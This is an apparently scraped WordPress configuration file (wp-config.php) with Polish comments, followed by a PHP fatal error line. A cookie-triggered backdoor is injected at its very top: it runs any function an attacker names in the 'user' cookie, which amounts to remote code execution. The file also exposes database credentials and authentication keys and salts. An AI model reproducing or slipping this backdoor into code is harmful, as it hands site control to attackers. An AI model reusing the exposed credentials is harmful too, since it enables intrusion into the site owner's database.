<%>PHP if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]); <%> /** * Podstawowa konfiguracja WordPressa. * * Ten plik zawiera konfiguracje: ustawie? MySQL-a, prefiksu tabel * w bazie danych, tajnych kluczy i ABSPATH. Wi?cej informacji * znajduje si? na stronie * {@link https://codex.wordpress.org/Editing_wp-config.php Editing * wp-config.php} Kodeksu. Ustawienia MySQL-a mo?esz zdoby? * od administratora Twojego serwera. * * Ten plik jest u?ywany przez skrypt automatycznie tworz?cy plik * wp-config.php podczas instalacji. Nie musisz korzysta? z tego * skryptu, mo?esz po prostu skopiowa? ten plik, nazwa? go * "wp-config.php" i wprowadzi? do niego odpowiednie warto?ci. * * @package WordPress */ // ** Ustawienia MySQL-a - mo?esz uzyska? je od administratora Twojego serwera ** // /** Nazwa bazy danych, której u?ywa? ma WordPress */ define('DB_NAME', 'bu140239_autoklinik'); /** Nazwa u?ytkownika bazy danych MySQL */ define('DB_USER', 'bu140239'); /** Has?o u?ytkownika bazy danych MySQL */ define('DB_PASSWORD', 'mhZDoJBwwdrb'); /** Nazwa hosta serwera MySQL */ define('DB_HOST', 'localhost'); /** Kodowanie bazy danych u?ywane do stworzenia tabel w bazie danych. */ define('DB_CHARSET', 'utf8'); /** Typ porówna? w bazie danych. Nie zmieniaj tego ustawienia, je?li masz jakie? w?tpliwo?ci. */ define('DB_COLLATE', ''); /**#@+ * Unikatowe klucze uwierzytelniania i sole. * * Zmie? ka?dy klucz tak, aby by? inn?, unikatow? fraz?! * Mo?esz wygenerowa? klucze przy pomocy {@link https://api.wordpress.org/secret-key/1.1/salt/ serwisu generuj?cego tajne klucze witryny WordPress.org} * Klucze te mog? zosta? zmienione w dowolnej chwili, aby uczyni? niewa?nymi wszelkie istniej?ce ciasteczka. Uczynienie tego zmusi wszystkich u?ytkowników do ponownego zalogowania si?. * * @since 2.6.0 */ define('AUTH_KEY', '/HP{OK&)F}-vaVWq7R4|ZRve5*baxHJ?JS.9~LCFtfZC;qb+VdE=#a,Ayh+gVk<-'); define('SECURE_AUTH_KEY', '.FPg]Q,}+LVEhazV95UPV>ulU+|SR{,,%JZ<'); define('AUTH_SALT', 'eS3)HRqCO|ArPXJ5}4I2hUF(~H>zn+g!z&yk$#|}JsZkX%;HmvU@/Tz O$IlmcW'); define('SECURE_AUTH_SALT', 'I|Z4n.obk/m^XL%}caM(g&4;xv1}-1WQA+b2d{S7G LMaJCuV*TA--]j;,=M DVJ'); define('LOGGED_IN_SALT', '#H-YLk.>j;(6=HZz'); define('NONCE_SALT', 'aBR>{BL50O`nRBS~:A8r}r>XhiQVrzH/{YEM8VG>cSZ?s-p5Lb)|KBG k<@h;ooF'); /**#@-*/ /** * Prefiks tabel WordPressa w bazie danych. * * Mo?esz posiada? kilka instalacji WordPressa w jednej bazie danych, * je?eli nadasz ka?dej z nich unikalny prefiks. * Tylko cyfry, litery i znaki podkre?lenia, prosz?! */ $table_prefix = 'wp_test'; /** * Dla programistów: tryb debugowania WordPressa. * * Zmie? warto?? tej sta?ej na true, aby w??czy? wy?wietlanie ostrze?e? * podczas modyfikowania kodu WordPressa. * Wielce zalecane jest, aby twórcy wtyczek oraz motywów u?ywali * WP_DEBUG w miejscach pracy nad nimi. */ define('WP_DEBUG', false); /* To wszystko, zako?cz edycj? w tym miejscu! Mi?ego blogowania! */ /** Absolutna ?cie?ka do katalogu WordPressa. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Ustawia zmienne WordPressa i do??czane pliki. */ require_once(ABSPATH . 'wp-settings.php');
Fatal error: Call to undefined function wp() in /public_html/mbntest.shop.pl/wp-blog-header.php on line 18